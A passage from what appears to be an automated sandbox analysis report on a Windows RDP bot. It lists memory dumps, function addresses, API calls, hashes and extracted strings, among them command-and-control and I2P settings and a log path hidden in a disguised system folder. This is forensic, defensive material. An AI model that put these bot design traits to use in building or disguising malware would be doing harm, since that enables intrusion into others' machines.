                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    • Opcode ID: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
                    • Instruction ID: b3667a72461a579f01bd083bdf02c04c75045806a1d4aa2408a1437682ba8800
                    • Opcode Fuzzy Hash: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
                    • Instruction Fuzzy Hash: 9EA1482190C74B91FA30ABCCE8617B9B350AF407C8F541132DB5E46BA1EEADF995D342
                    Function 00007FF8BFB8D6C2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    • Opcode ID: e0d0507b3a6c418314780e5cd595686b87934a5845e747169805726748d1ec43
                    • Instruction ID: 521b050ca184c651ed9dfebace145161b87e1e72b4d62eb84e868271a24a3956
                    • Opcode Fuzzy Hash: e0d0507b3a6c418314780e5cd595686b87934a5845e747169805726748d1ec43
                    • Instruction Fuzzy Hash: 28A14921A0C74B91FB60ABCCE8403B97351AF887C4F544133CB4E46697EEADE985C362
                    Function 00007FF8B915B0E2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    • Opcode ID: 428d5fea51d9c1de1b694d77009b856a7566bb1f16a7a93045fe153b6cb68c6f
                    • Instruction ID: 81286e7b30b63b9601357d47c3967e613c629b40faa304e186c319f18425bd9b
                    • Opcode Fuzzy Hash: 428d5fea51d9c1de1b694d77009b856a7566bb1f16a7a93045fe153b6cb68c6f
                    • Instruction Fuzzy Hash: CDA14B60E8C78B81F6619F2CA9403B82254AF403C8F568133DB5E56695EFADF985F342
                    Function 00007FF8BFAB7E42 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    • Opcode ID: a723a54cd343313568721d095f8a87cc706e6852ad108b433f86050c43f96ab7
                    • Instruction ID: 6240b5449d1d1fc559b0a78201f5dea37e51c2a4e63e05ab43589d63e1ae002e
                    • Opcode Fuzzy Hash: a723a54cd343313568721d095f8a87cc706e6852ad108b433f86050c43f96ab7
                    • Instruction Fuzzy Hash: 55A1025190DB4B95F638A7CCBC43378A354AF087CCF542132DB1E46696EE6DE986D302
                    Function 00007FF8BA508702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    • Opcode ID: 931fbe224b6d1362edbcaa76613dba2ac2475fcda5323f9d284c0134768a3e7b
                    • Instruction ID: 5d06e6602c24fd80e8569f7e16c001c9d1686422ebe01ccf2df99a3a13329460
                    • Opcode Fuzzy Hash: 931fbe224b6d1362edbcaa76613dba2ac2475fcda5323f9d284c0134768a3e7b
                    • Instruction Fuzzy Hash: 19A11E6090C74BD1F630A78CAC80BBA3250AB027C4F5405B6DF4E46BB5EE6DAB85D707
                    Function 00007FF8B9182472 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    • Opcode ID: 481f3edfdb410c9c7dbf8b9b942a96f2820c5aded1884b0906b34a899a34cc49
                    • Instruction ID: d0bca432a8c548f127ec2364f3478f1f2111b7f359857d154c8fb66883693118
                    • Opcode Fuzzy Hash: 481f3edfdb410c9c7dbf8b9b942a96f2820c5aded1884b0906b34a899a34cc49
                    • Instruction Fuzzy Hash: C6A17261D0C7C781FA229F4DA8C43782250AF117C4F924532DB1E476A7EE6DE986F342
                    Function 00007FF8BFB83D25 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 180threadCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CreateErrorLastThread
                    • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                    • API String ID: 1689873465-2891999747
                    • Opcode ID: 97be6b5ad07804f14644d956753ed9498501f368d80ed370f2936be80a530947
                    • Instruction ID: 38ad52acea5631fec55358683cf5caa898b0a6e3b83b17df0c577eb508ff775a
                    • Opcode Fuzzy Hash: 97be6b5ad07804f14644d956753ed9498501f368d80ed370f2936be80a530947
                    • Instruction Fuzzy Hash: 8C919362A0C74381FB209BDCE8847B92394AF843E4F589235C75E462E2DF7CE955C351
                    Function 00007FF70887227B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$fclosefopenfwrite
                    • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                    • API String ID: 608220805-961576452
                    • Opcode ID: a67f0dc2a6d4684223e578e44850183a75426716cbfc7b6913680d7abbc67771
                    • Instruction ID: e3024f8db6a5df9c0465ef1f886e1f66277ee1d2ab5ebf2c952562496778aa28
                    • Opcode Fuzzy Hash: a67f0dc2a6d4684223e578e44850183a75426716cbfc7b6913680d7abbc67771
                    • Instruction Fuzzy Hash: C4517162A69A43C1FA10FB54DD40AB8E321BF50794FD40136D95E472E5DF3CE9AA8328
                    Function 00007FF8BFB85A5E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                    • API String ID: 1104438493-906809513
                    • Opcode ID: 06752aa5a4281953a201f9da300dc2996c40b0526a77fcdae041027a90c7b52c
                    • Instruction ID: bc6e1a3ffb38801d94d25b8a651edbd589e382edbf2a1d18a8aa8eb8d96eef26
                    • Opcode Fuzzy Hash: 06752aa5a4281953a201f9da300dc2996c40b0526a77fcdae041027a90c7b52c
                    • Instruction Fuzzy Hash: 94717C12F0C64382FA605B9CE884BB92351AFD47E4F556136DB4E47A97FE2CA845CB01
                    Function 00007FF8BA5042BE Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                    • API String ID: 1104438493-906809513
                    • Opcode ID: bb568f17dd6a2e4523c81be14fcf721ce6dfccabb5d46468dc8857a08ea5cd7d
                    • Instruction ID: ee4eb9f1f05ff7411ab9124cb4fa73fc6e7ed00acc3589e544e836289d954712
                    • Opcode Fuzzy Hash: bb568f17dd6a2e4523c81be14fcf721ce6dfccabb5d46468dc8857a08ea5cd7d
                    • Instruction Fuzzy Hash: 34715CB1E0C243D2FB309A9DEC817BA1260AB567C8F5551B2DF0F476A5DE2CBB858301
                    Function 00007FF708879B8C Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 139stringfileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                    • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                    • API String ID: 3216678114-1460613360
                    • Opcode ID: a5d516edc8c3acebe8675670bd7bd948a877cc186cddc822a86a05c519dfc104
                    • Instruction ID: 7c45088fdd511256500dbb17f9d33e47919cae2509dd3efc317f63a067ae740c
                    • Opcode Fuzzy Hash: a5d516edc8c3acebe8675670bd7bd948a877cc186cddc822a86a05c519dfc104
                    • Instruction Fuzzy Hash: 5F513E51E2C603C1FA20F714AD80BB9EAA1AF44758FD40132C60D462E6EF6DE9B5C36D
                    Function 00007FF7088779C0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 193stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                    • String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                    • API String ID: 3066828623-625159688
                    • Opcode ID: adabd977a69a3ef9042cc3ebe017081a7012f2dca71a4d26c5f7059b2c8a3415
                    • Instruction ID: bd241d3e69d1e966a1d64a3aee954dbc495f23c9942fd8dd4c1bf6a13050135e
                    • Opcode Fuzzy Hash: adabd977a69a3ef9042cc3ebe017081a7012f2dca71a4d26c5f7059b2c8a3415
                    • Instruction Fuzzy Hash: E5816C61A2864395FA10FB15EC40BAAE770EF44788FC44036EA4D472D5EF7CE5A9C728
                    Function 00007FF708878563 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 179stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                    • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                    • API String ID: 548194777-214984806
                    • Opcode ID: 0f11d183b7847359bd63d1c8ae58d1454adc20786cfbdc33d249472175fb6a43
                    • Instruction ID: 468431911774a7f1837cb1012b4d16f84223c54651cb92bccda3d6a1705bd6dc
                    • Opcode Fuzzy Hash: 0f11d183b7847359bd63d1c8ae58d1454adc20786cfbdc33d249472175fb6a43
                    • Instruction Fuzzy Hash: 9C815E61A2864391FA61FB01AC58BB9E3A1AF44B88FC44035DA4D477D5DF3CE5A5C32C
                    Function 00007FF708873D81 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 199fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873DD9
                    • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873E12
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873EE7
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873FCC
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708874140
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleLock
                    • String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                    • API String ID: 2747014929-3958755462
                    • Opcode ID: e08b57e1d64f4ed034d72367372542c59a4750ac954711598e8bb1b168df4860
                    • Instruction ID: 29c3fe229583c29513c444b9ba4095ca36d96f5e6c49e6f175a7175697b2d29a
                    • Opcode Fuzzy Hash: e08b57e1d64f4ed034d72367372542c59a4750ac954711598e8bb1b168df4860
                    • Instruction Fuzzy Hash: 3C813D51A6C74A81F670FB14AD44BB8E170AF10354FD41232C96E06BD1EF2EE9E5932E
                    Function 00007FF8BFB526AC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
